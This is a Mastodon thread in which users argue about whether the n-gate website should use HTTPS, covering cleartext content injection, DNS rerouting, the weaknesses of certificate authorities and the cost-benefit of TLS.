I /really/ need to add to my rss reader because it’s *so good*. This is the best description I’ve ever seen of the Microsoft acquisition of Github.

· MastodonToTwitter · 4 · 61 · 75
@wxcafe For your weekly dose of cynicism and bad faith. Definitely would recommend ^^

@wxcafe Interestingly, n-gate doesn't seem to support https.

@wxcafe Maybe if security doesn't matter to you. Especially given how easy and cost-free it is to set up these days.

@wxcafe HTML is information, and the purpose of HTTP is to exchange it.

Anyone intercepting the connection at any point can still inject stuff (like scripts), even if the original host only provides static content. And anyone can still read out the entire message and use it for personal/meta data harvesting.

Anyone understanding what the words "information", "exchange" and "security" mean would care.

@wxcafe @tyil so friendly.. I think he has a good point: Setting up TLS certificates is super easy these days.

After all it is the authors decision not to do it. Can not really blame someone for that. If he doesn't know better: educate him.

If you really cared for "security" in that context you should try to get a cert fingerprint in-person from the author/admin. The certificate authority system is broken anyway...

@andi @tyil look, I know. I have TLS everywhere. I used to have self-signed certs everywhere before LE came along. I have a yubikey to store my gpg key. I do totp 2fa on ssh logins. I get crypto. But I also get that some things are not worth tls-ing, and that who the fuck gives a shit. It’s literally not a problem for anyone. It’lol be flagged as insecure by browsers soon and they’ll probably upgrade then. It’s fine, calm down, stop telling strangers on the internet.

@wxcafe @andi

Nice wall of buzzwords. Doesn't change the fact you don't grasp basic concepts of "information", "exchange" or "security", and then proceed to tell people to "piss off" when they try to explain it to you.

@andi @wxcafe "The certificate authority system is broken anyway..."

No discussion there, the CA system is horrible.

@tyil @andi @wxcafe And when we have a browser-supported encryption scheme that doesn't use the CA system, I'll happily join the "encrypt everything" bandwagon.

@ocdtrekkie @andi @wxcafe That's fair. I acknowledge the current CA system is broken, and that we should adopt a better system.

@wxcafe this is why I ultimately don't like n-gate

they're contrarian to *everything*, virtually no exceptions, and it gets old and depressing after a while. I don't want to see that much shit consistently week after week, even if some of it is funny.

@tyil @wxcafe I mean, I agree that not using TLS is just kinda lazy now, but if I had the capability to pull off the cleartext packet injection attack you're describing literally what prevents me from just rerouting your next DNS request to a fallback insecure host of my own for more pwnage?

@nickfarr @tyil look don’t try, this person clearly grasps basic concepts of “information”, “exchange” and “security” better than we do, we can’t compare

@wxcafe @tyil LOL, I'm not even considered "technical" by most of our mutual friends.

@nickfarr @wxcafe I'm not saying that applying TLS is the absolute cure-all for security vulnerabilities. We all know that's not true (I hope).

But it would prevent certain attacks for next to no cost. This faulty concept that some people have that plain-text sites are somehow secure by default is harmful to propagate, and I'd rather people not do that. Which is why I tried to explain that part.

@tyil @wxcafe And herein lies the crux: cost/benefit.

Just as there's no magic bullet for security, nor should anything be assumed as default secure, one can't be dogmatic in telling a total strangers what their threat model or cost/benefit is.

I've seen lots of people introduce new security holes trying to make TLS work in their environment. LE made it soooo much easier, but in shared environments (i.e. most hosting), TLS is still non-trivial.

@nickfarr I agree with you, don't get me wrong.

I just wanted to clear up to that person that static pages aren't "secure" any more than other pages. In reality, all content transmitted over HTTP are static pages.

@jasper @wxcafe While absolutely likely is it that the resolver doesn't support it and the domain is unsigned? Probably pretty good.

Sign in to participate in the conversation

This is a mastodon instance for social justice activists, LGBTQIA+ people, and activists in general See the Goals and technical details, and Rules and privacy policy pages for more information